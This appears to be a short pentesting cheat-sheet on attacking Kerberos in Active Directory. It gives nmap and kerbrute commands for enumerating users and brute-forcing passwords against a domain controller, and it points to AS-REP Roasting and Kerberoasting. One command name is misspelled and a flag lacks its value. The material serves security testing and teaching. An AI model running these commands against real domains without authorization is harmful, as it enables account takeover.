Kerberos Pentesting

Last modified: 2023-10-30

Active Directory Privilege Escalation Windows

An authentication protocol that is used to verify the identity of a user or host. It uses cryptography for authentication and is consisted of the client, the server, and the Key Distribution Center (KDC). A default port is 88. Kerberos also uses a 464 port for changing passwords.


To enumerate automatically, you can use nmap.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local'-p 88 <target-ip>

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth bruteforcing.
The wordlist (e.g. combos.txt) specified must be the "username:password" combinations.

# -v: verbose mode *it's recommended to add this flag otherwise we cannot confirm if the user exist or not.
# --dc: domain controller
# -d: domain
# combos.txt: the wordlist specified must be combinations with "username:password".
kerbrute bruteforce -v --dc -d example.domain combos.txt

# Users enumeration
kerbrute userenum -v --dc -d example.domain usernames.txt

# Brute force user's password
kerbture bruteuser -v --dc -d example.domain passwords.txt username

AS-REP Roasting

We might be able to find password hashes of user accounts that does not require preauthentication.
Please see AS-REP Roasting.

Kerberoasting Attack

If we have a password of some user, we might be able to gather another user credential.
Please see Kerberoasting Attack.